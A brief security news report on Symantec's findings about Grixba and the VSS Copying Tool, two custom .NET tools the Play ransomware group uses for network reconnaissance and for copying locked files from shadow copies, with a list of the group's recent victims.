The Play ransomware group has developed two custom tools in .NET, Grixba and VSS Copying Tool, to enhance the efficiency of its attacks. Symantec researchers discovered and analyzed the two tools and shared their findings before publishing their report.
Grixba is a network-scanning and information-stealing tool that uses WinRM, Remote Registry, Remote Services, and WMI in its scan mode to determine the software running on network devices.
On the other hand, the VSS Copying Tool allows attackers to interact with Volume Shadow Copy Service (VSS) using AlphaVSS .NET library bundled with API calls.
Play ransomware’s use of custom tools demonstrates that the infamous threat actor aims to increase the effectiveness of its attacks and carry out its malicious tasks more efficiently.
The tools allow attackers to enumerate users and computers in compromised networks, gather information about security, backup, and remote administration software, and easily copy files from VSS to bypass locked files.
The custom tools were written using Costura .NET development tools, which can build standalone executables that need no dependencies, making deployment on compromised systems easier.
Play ransomware has had several high-profile victims, including A10 Networks, Arnold Clark, the City of Oakland in California, and Rackspace, since the beginning of the year. The VSS Copying Tool, in particular, enables Play ransomware to steal files from shadow volume copies, even when the files are in use by applications.
The tools’ discovery and analysis by Symantec will help to improve defense against Play ransomware and enhance security measures for organizations.
